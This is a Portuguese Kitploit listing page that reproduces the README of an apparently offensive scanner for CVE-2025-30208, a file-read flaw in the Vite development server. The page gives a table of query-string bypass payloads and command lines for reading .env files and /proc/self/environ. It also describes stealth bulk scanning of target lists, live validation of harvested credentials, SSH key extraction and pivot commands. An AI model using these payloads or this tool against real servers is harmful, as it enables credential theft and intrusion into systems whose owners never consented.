Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-30208 — Scanner de exploração para CVE-2025-30208 (leitura arbitrária de arquivos do Vite) com detecção de bypass multivariante, coleta de credenciais, extração de chaves SSH e relatórios estruturados para testes de penetração autorizados. | Kitploit
Ferramentas/GitHubGitHub/hazavvip/cve-2025-30208
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosColeta de InformaçõesTestes de Penetração
GitHubhazavvip/cve-2025-30208

CVE-2025-30208

Scanner de exploração para CVE-2025-30208 (leitura arbitrária de arquivos do Vite) com detecção de bypass multivariante, coleta de credenciais, extração de chaves SSH e relatórios estruturados para testes de penetração autorizados.

Ver Repositório
22há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-30208 — Leitura Arbitrária de Arquivos no Vite · v5

CVE: CVE-2025-30208
GHSA: GHSA-x574-m823-4x7w
Severidade: CVSS 5.3 Médio (servidor de desenvolvimento acessível pela rede)

⚠ Apenas para engajamentos de segurança autorizados.
O uso não autorizado contra sistemas que você não possui ou para os quais não tenha permissão explícita por escrito para testar é ilegal.


Descrição

O servidor de desenvolvimento do Vite permite servir arquivos arbitrários do sistema de arquivos do host através de solicitações /@fs/.
Uma verificação de sanitização de query-string ausente em versões afetadas permite que um atacante anexe sufixos especialmente criados para contornar a lista de permissões e ler qualquer arquivo que o processo possa acessar — incluindo arquivos .env, chaves privadas SSH, credenciais de nuvem e entradas /proc.


Versões Afetadas

RamoÚltima vulnerávelCorrigido
6.3.x6.3.06.3.1+
6.2.x6.2.26.2.3+
6.1.x6.1.16.1.2+
6.0.x6.0.116.0.12+
5.4.x5.4.145.4.15+
4.5.x4.5.94.5.10+

Variantes de Bypass

NomeSufixo / QueryDescrição
raw???raw???? à direita quebra rawRE
import&raw???import&raw??ES module + raw combinados
raw??raw?? único à direita
url&raw???url&raw??Modo URL combinado
raw&url???raw&url??Ordem de parâmetros invertida
import&?raw?import&?rawPrefixo de import malformado
sec-fetch?raw + cabeçalho Sec-FetchContexto de script do navegador
raw-encoded?raw%3f%3fSeparadores codificados em URL
double-slash?raw??/Bypass com barra dupla (v5)
pct-all%3fraw%3f%3fQuery totalmente codificada em percentual (v5)
raw-hash?raw??#Bypass com âncora de fragmento (v5)
wasm-init?inline=1.wasm?initIrmão do CVE-2025-31125 (wasm init)

Instalação

pip install requests
# ou
pip install -r requirements.txt

Uso

Alvo único — varredura completa

python main.py -t https://target.com

Cadeia completa de exploração (validação de credenciais ao vivo, comportamento padrão)

python main.py -t https://target.com --full-chain --output /tmp/report

Ler um arquivo específico

python main.py -t https://target.com --file /app/.env
python main.py -t https://target.com --file /proc/self/environ --save ./environ.txt

Modo furtivo (atrasos aleatórios) + proxy upstream

python main.py -t https://target.com --stealth --proxy http://127.0.0.1:8080

Varredura em lote a partir de uma lista de alvos

python main.py -l targets.txt
python main.py -l targets.txt --workers 20 --ports 5173,3000,8080

Saída amigável para pipes (sem códigos ANSI)

python main.py -t https://target.com --no-color | tee scan.log

Versão

python main.py --version

Executar como pacote

python -m cve30208 -t https://target.com

Referência da CLI

FlagPadrãoDescrição
-t/--target—URL do alvo único
-l/--lists—Arquivo contendo um alvo por linha
--stealthdesligadoAdicionar atrasos aleatórios entre requisições
--proxy—Proxy HTTP/HTTPS (http://host:port)
--timeout10Tempo limite por requisição em segundos
--verifydesligadoHabilitar verificação de certificado TLS
--file—Ler um caminho específico no host alvo
--save—Salvar conteúdo de --file em um caminho local
--full-chainligadoExecutar cadeia completa de exploração (validação ao vivo é padrão)
--output—Escrever relatório JSON + Markdown neste caminho base
--workers10Trabalhadores paralelos para varredura em lote
--portsveja abaixoPortas separadas por vírgula para sondar em modo lote
--no-color/--plaindesligadoDesabilitar códigos de cor ANSI
--safe-modedesligadoOcultar valores de segredos na saída do terminal
--show-secretsdesligadoMostrar segredos completos no terminal (sobrescreve --safe-mode)
--version—Imprimir versão e sair

Portas padrão para varredura em lote: 5173, 4173, 3000, 8080, 8000, 4000, 5000, 9000, 80, 443


Saída

Quando --output /tmp/report é especificado, o scanner escreve:

  • /tmp/report.json — resultados estruturados legíveis por máquina
  • /tmp/report.md — relatório Markdown legível por humanos

A varredura em lote sempre imprime VULN_COUNT=N na última linha para fácil script em shell:

python main.py -l targets.txt | grep '^VULN_COUNT='

Varreduras de alvo único imprimem SCAN_STATUS=VULNERABLE|NOT_VULNERABLE no final para automação.


Arquitetura (v5)

cve30208/
├── __init__.py      — superfície da API pública
├── __main__.py      — ponto de entrada python -m cve30208
├── constants.py     — constantes BYPASS, CVE_SIBLING, SECRET_PATTERNS, SSH/scan
├── ui.py            — códigos de cor ANSI, Spin/NullSpin, auxiliares de terminal
├── utils.py         — helpers compartilhados (_unescape_js_string)
├── secrets.py       — scan_secrets(), parse_env(), parse_environ()
├── ssh.py           — extract_ssh_key(), collect_ssh_targets()
├── exploit.py       — ExploitResult, ExploitStage (validação de credenciais ao vivo)
                      inclui um registro de verificação para extensão mais fácil
├── report.py        — save_report(), make_md()
└── scanner.py       — dataclasses FR/R, Scanner, bulk_scan(), main()
main.py              — shim de compatibilidade reversa
requirements.txt

Deduplicação

O scanner suprime automaticamente artefatos repetidos para que a saída permaneça limpa mesmo quando HOME é igual a /root ou o mesmo segredo aparece em múltiplos arquivos:

CamadaMecanismo
Leituras do sistema de arquivosstage_fs normaliza a lista base de chaves SSH com dict.fromkeys e remove caminhos duplicados da fila reads antes que qualquer saída seja produzida.
Salvamento de arquivosScanner._save verifica um conjunto _seen_file_paths por varredura; caminhos duplicados retornam o FR já armazenado sem readicionar a r.files.
SegredosScanner._save desduplica r.secrets globalmente por (name, value) em todos os arquivos; a desduplicação dentro do arquivo é tratada separadamente em scan_secrets.
Chaves SSHstage_ssh colapsa chaves com a mesma assinatura PEM (primeiros _PEM_SIG_LEN bytes) que aparecem em múltiplos arquivos fonte.
Comandos de pivôBlocos de pivô são chaveados por (key_source, host, port); combinações idênticas são impressas apenas uma vez.

A linha de resumo informa quantos arquivos, segredos e chaves SSH foram suprimidos como duplicatas, por exemplo:

  desduplicado 2 arquivo(s), 4 credencial(is), 1 chave(s) SSH suprimidas como duplicatas

Remediação

Baixar ferramenta